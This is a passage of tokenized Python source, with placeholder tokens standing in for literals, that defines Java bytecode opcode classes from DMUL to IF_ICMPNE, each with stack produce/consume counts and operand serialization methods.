return <NUM_LIT:0> <EOL> class DMUL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DMUL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DNEG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DNEG , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DREM ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DREM , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DRETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DRETURN , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( DSTORE , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSTORE_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DSTORE_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSTORE_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DSTORE_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSTORE_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DSTORE_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSTORE_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DSTORE_3 , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSUB ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DSUB , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DUP ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DUP_X1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP_X1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DUP_X2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP_X2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:4> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class DUP2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:4> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DUP2_X1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP2_X1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:4> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class DUP2_X2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP2_X2 , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:6> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:4> <EOL> class F2D ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( F2D , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class F2I ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( F2I , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class F2L ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( F2L , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FADD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FADD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class FCMPG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FCMPG , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FCMPL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FCMPL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FCONST_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FCONST_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FCONST_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FCONST_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FCONST_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FCONST_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FDIV ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FDIV , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FLOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( FLOAD , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . 
read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FLOAD_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FLOAD_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FLOAD_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FLOAD_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FLOAD_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FLOAD_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FLOAD_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FLOAD_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FMUL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FMUL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FNEG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FNEG , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FREM ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FREM , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FRETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FRETURN , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( FSTORE , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSTORE_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FSTORE_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSTORE_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FSTORE_1 , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSTORE_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FSTORE_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSTORE_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FSTORE_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSUB ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FSUB , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class GETFIELD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , field_name , descriptor ) : <EOL> super ( GETFIELD , self ) . __init__ ( ) <EOL> self . field = Fieldref ( class_name , field_name , descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . field . class_name , self . field . name , self . field . name_and_type . descriptor ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> field = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> field . class_name , <EOL> field . name , <EOL> field . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . field ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . field . 
resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class GETSTATIC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , field_name , descriptor ) : <EOL> super ( GETSTATIC , self ) . __init__ ( ) <EOL> self . field = Fieldref ( class_name , field_name , descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . field . class_name , self . field . name , self . field . name_and_type . descriptor ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> field = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> field . class_name , <EOL> field . name , <EOL> field . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . field ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . field . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class GOTO ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( GOTO , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . 
offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class GOTO_W ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( GOTO_W , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:5> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s4 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s4 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class I2B ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2B , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class I2C ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2C , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class I2D ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2D , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class I2F ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2F , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class I2L ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2L , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class I2S ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2S , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IADD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IADD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IAND ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IAND , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class ICONST_M1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_M1 , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_4 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_4 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_5 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_5 , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class IDIV ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IDIV , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ACMPEQ ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ACMPEQ , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ACMPNE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ACMPNE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPEQ ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPEQ , self ) . __init__ ( ) <EOL> self . 
offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPGE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPGE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPGT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPGT , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . 
offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPLE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPLE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPLT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPLT , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPNE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPNE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ 